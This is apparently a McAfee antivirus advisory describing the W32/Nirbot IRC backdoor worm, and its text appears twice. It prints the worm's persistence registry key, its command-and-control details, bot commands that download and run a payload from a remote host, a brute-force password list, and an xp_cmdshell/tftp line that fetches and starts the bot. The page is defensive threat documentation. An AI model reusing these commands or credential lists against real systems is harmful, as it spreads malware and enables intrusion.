McAfee > Theat Center > Virus Detail Page

Overview

-- Update April 16, 2007 --

A new variant in this family has been discovered which appears to exploit CVE-2007-1748.  We will add more details to this description as they are available.

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDos attack on internet systems. W32/Nirbot is written in C++ and is typically packed with EXECrypter.

There are multiple versions of the W32/Nirbot family of worms that use IRC (Internet Relay Chat) as a command and control mechanism. Such worms typically use exploits and weak password to spread to vulnerable machines on the network.

Aliases

• Backdoor.Vanbot.Gen!Pac (VirusBuster)

• Backdoor.Win32.VanBot.bj (Kaspersky)

• BDS/VanBot.BJ (Avira)

• W32.Rinbot!gen (Symantec)

• W32/Delbot-S (Sophos)

• W32/Rinbot.H!tr (Fortinet)

• W32/Rinbot.H.worm (Panda)

• WORM_RINBOT.T (Trend Micro)

Characteristics

--- Updated March 9th, 2007:
W32/Nirbot.worm has been deemed Low-Profiled due to media attention at http://www.baltimoresun.com/news/local/annearundel/bal-virus0308,0,2491750.story?coll=bal-local-arundel
--

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDos attack on internet systems. W32/Nirbot is written in C++ and is typically packed with EXECrypter.

Upon execution, it creates a copy of itself into the Windows system directory:

%Windir%\%SYSDIR%\zlclint.exe

Adds the following values to the registry to auto start itself when Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"zone alarm security" =""%Windir%\%SYSDIR%\zlclint.exe"

Checks if a debugger is present on the system and quits executing if present. This is done to prevent researchers from debugging the worm.

Creates the following mutexes to ensure that only one instance of the worm can run on a computer at any time.

• p3n1z
• DBWinMutex
  

W32/Nirbot.worm attempts to join the following IRC server and waits for instructions.

• IRC Server: 69.181.7.xxx
• Channel: ##CO hellovalsmit
• Port: 8080
• Nickname = [2K|USA|P|00|random]

where Nickname = [2K|USA|P|00|random] denotes

• 2K/USA   --> information about OS and client locale.
• P             --> indicates the client ip address is private.
• 00           --> client uptime in days.
• random   --> used to avoid name collision on chat room.

Once the bot connects to the IRC server, a remote attacker can use the bot to scan for vulnerable machines on the network. If the attack on a vulnerable  computer is successful, it issues a TFTP commands to download and execute a copy of itself from the attacking machine.

Symptoms

The following tasks can be performed using this bot.

• Gather system information (CPU, RAM, OS Version, IP address, UserName, Uptime)
• Scan network for machines to infect.
• Launch a TFTP, HTTP server and SOCKS4 proxy.
• Download and Execute files.
• Update bot.
• Uninstall bot.

A simulation of an attacker controlling the bot is shown below.



At the time of joining the attacker's channel, the following commands were currently set as the channel topic.

.scan.start NETAPI x.x.x.x 60 -s

The above channel topic directs the bot to perform the following functions:

.scan.start  –  bot command to scan for vulnerable systems
netapi        –  attempt to exploit vulnerable hosts using the MS06-040 exploit
x.x.x.x       –  tells the bot to scan all classes of ip
60             –  the number of concurrent threads
-s              –  the scan would be silent and not report its findings back in the channel

.update http://www.jimmybuttons.[Removed]/mbp.exe C:\dsdv.exe -s

where,

.update       –  bot command to download remote file
-s               –  install would be silent

The second example of a command instructs the bot to download a binary from a remote web server as "C:\dsdv.exe" and execute it.  The file "mbp.exe" currently being downloaded is a newer version of the bot and is done to keep the bot undetected in the wild for a extended period.

Note: As the website being communicated is normally controlled by the malware author, any files being downloaded can be remotely modified and the behavior of these new binaries altered - possibly with every user infection.

Method of Infection

W32/Nirbot.worm scans for vulnerable machines on the network, and uses the following vulnerabilities to spread.

• Microsoft Windows Server Service Buffer Overflow (MS06-040)
  
• Symantec Client Security and Symantec Antivirus Elevation of privilege vulnerability (SYM06-010)
  
• Weak password exploitation of SQL servers.

The bots scan for computers with an exposed port 1433 - the default MS SQL server port and attempts to create an SQL connection to that port. It tries to log on with the following usernames and password combinations:

1234
2000
2001
2002
2003
2004
12345
123456
1234567
12345678
123456789
1234567890
access
accounting
accounts
admin
administrador
administrat
administrateur
administrator
admins
backup
bill
bitch
blank
brian
changeme
chris
cisco
compaq
control
data
database
databasepass
databasepassword
db1234
dbpass
dbpassword
default
dell
demo
domain
domainpass
domainpassword
eric
exchange
fred
fuck
george
guest
hell
hello
home
homeuser
internet
internet
intranet
john
kate
katie
linux
login
loginpass
luke
mail
main
mary
mike
neil
nokia
none
null
oeminstall
oemuser
office
oracle
orainstall
outlook
pass
pass1234
passwd
password
password1
peter
peter
qwerty
root
server
siemens
slut
sqlpassoainstall
staff
student
susan
system
teacher
technical
test
unix
user
win2000
win2k
win98
windows
winnt
winpass
winxp

If authentication is successful and the compromised SQL account has sufficient rights, the following SQL query is passed to "tftp.exe" to download and execute a copy of the bot via the following command:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

• Weak password exploitation of network shares.

The bot attempts to spread by finding improperly secured NetBios shares. It attempts to connect to computers with shared drives and tries the above listed combinations of passwords.

Removal

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants

N/A

All Information

Overview -

-- Update April 16, 2007 --

A new variant in this family has been discovered which appears to exploit CVE-2007-1748.  We will add more details to this description as they are available.

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDos attack on internet systems. W32/Nirbot is written in C++ and is typically packed with EXECrypter.

There are multiple versions of the W32/Nirbot family of worms that use IRC (Internet Relay Chat) as a command and control mechanism. Such worms typically use exploits and weak password to spread to vulnerable machines on the network.

Aliases

• Backdoor.Vanbot.Gen!Pac (VirusBuster)

• Backdoor.Win32.VanBot.bj (Kaspersky)

• BDS/VanBot.BJ (Avira)

• W32.Rinbot!gen (Symantec)

• W32/Delbot-S (Sophos)

• W32/Rinbot.H!tr (Fortinet)

• W32/Rinbot.H.worm (Panda)

• WORM_RINBOT.T (Trend Micro)

Characteristics

Characteristics -

--- Updated March 9th, 2007:
W32/Nirbot.worm has been deemed Low-Profiled due to media attention at http://www.baltimoresun.com/news/local/annearundel/bal-virus0308,0,2491750.story?coll=bal-local-arundel
--

W32/Nirbot.worm is an internet relay chat controlled backdoor, which provides an attacker with unauthorized remote access to the compromised computer. An attacker can gain control over the compromised computer and use it to send spam, install adware or launch a DDos attack on internet systems. W32/Nirbot is written in C++ and is typically packed with EXECrypter.

Upon execution, it creates a copy of itself into the Windows system directory:

%Windir%\%SYSDIR%\zlclint.exe

Adds the following values to the registry to auto start itself when Windows starts:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
"zone alarm security" =""%Windir%\%SYSDIR%\zlclint.exe"

Checks if a debugger is present on the system and quits executing if present. This is done to prevent researchers from debugging the worm.

Creates the following mutexes to ensure that only one instance of the worm can run on a computer at any time.

• p3n1z
• DBWinMutex
  

W32/Nirbot.worm attempts to join the following IRC server and waits for instructions.

• IRC Server: 69.181.7.xxx
• Channel: ##CO hellovalsmit
• Port: 8080
• Nickname = [2K|USA|P|00|random]

where Nickname = [2K|USA|P|00|random] denotes

• 2K/USA   --> information about OS and client locale.
• P             --> indicates the client ip address is private.
• 00           --> client uptime in days.
• random   --> used to avoid name collision on chat room.

Once the bot connects to the IRC server, a remote attacker can use the bot to scan for vulnerable machines on the network. If the attack on a vulnerable  computer is successful, it issues a TFTP commands to download and execute a copy of itself from the attacking machine.

Symptoms

Symptoms -

The following tasks can be performed using this bot.

• Gather system information (CPU, RAM, OS Version, IP address, UserName, Uptime)
• Scan network for machines to infect.
• Launch a TFTP, HTTP server and SOCKS4 proxy.
• Download and Execute files.
• Update bot.
• Uninstall bot.

A simulation of an attacker controlling the bot is shown below.



At the time of joining the attacker's channel, the following commands were currently set as the channel topic.

.scan.start NETAPI x.x.x.x 60 -s

The above channel topic directs the bot to perform the following functions:

.scan.start  –  bot command to scan for vulnerable systems
netapi        –  attempt to exploit vulnerable hosts using the MS06-040 exploit
x.x.x.x       –  tells the bot to scan all classes of ip
60             –  the number of concurrent threads
-s              –  the scan would be silent and not report its findings back in the channel

.update http://www.jimmybuttons.[Removed]/mbp.exe C:\dsdv.exe -s

where,

.update       –  bot command to download remote file
-s               –  install would be silent

The second example of a command instructs the bot to download a binary from a remote web server as "C:\dsdv.exe" and execute it.  The file "mbp.exe" currently being downloaded is a newer version of the bot and is done to keep the bot undetected in the wild for a extended period.

Note: As the website being communicated is normally controlled by the malware author, any files being downloaded can be remotely modified and the behavior of these new binaries altered - possibly with every user infection.

Method of Infection

Method of Infection -

W32/Nirbot.worm scans for vulnerable machines on the network, and uses the following vulnerabilities to spread.

• Microsoft Windows Server Service Buffer Overflow (MS06-040)
  
• Symantec Client Security and Symantec Antivirus Elevation of privilege vulnerability (SYM06-010)
  
• Weak password exploitation of SQL servers.

The bots scan for computers with an exposed port 1433 - the default MS SQL server port and attempts to create an SQL connection to that port. It tries to log on with the following usernames and password combinations:

1234
2000
2001
2002
2003
2004
12345
123456
1234567
12345678
123456789
1234567890
access
accounting
accounts
admin
administrador
administrat
administrateur
administrator
admins
backup
bill
bitch
blank
brian
changeme
chris
cisco
compaq
control
data
database
databasepass
databasepassword
db1234
dbpass
dbpassword
default
dell
demo
domain
domainpass
domainpassword
eric
exchange
fred
fuck
george
guest
hell
hello
home
homeuser
internet
internet
intranet
john
kate
katie
linux
login
loginpass
luke
mail
main
mary
mike
neil
nokia
none
null
oeminstall
oemuser
office
oracle
orainstall
outlook
pass
pass1234
passwd
password
password1
peter
peter
qwerty
root
server
siemens
slut
sqlpassoainstall
staff
student
susan
system
teacher
technical
test
unix
user
win2000
win2k
win98
windows
winnt
winpass
winxp

If authentication is successful and the compromised SQL account has sufficient rights, the following SQL query is passed to "tftp.exe" to download and execute a copy of the bot via the following command:

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s EXEC master..xp_cmdshell 'tftp -i %s GET irn.exe&start irn.exe&exit

• Weak password exploitation of network shares.

The bot attempts to spread by finding improperly secured NetBios shares. It attempts to connect to computers with shared drives and tries the above listed combinations of passwords.

Removal -

Removal -

A combination of the latest DATs and the Engine will be able to detect and remove this threat. AVERT recommends users not to trust seemingly familiar or safe file icons, particularly when received via P2P clients, IRC, email or other media where users can share files.

Additional Windows ME/XP removal considerations

Variants

Variants -

N/A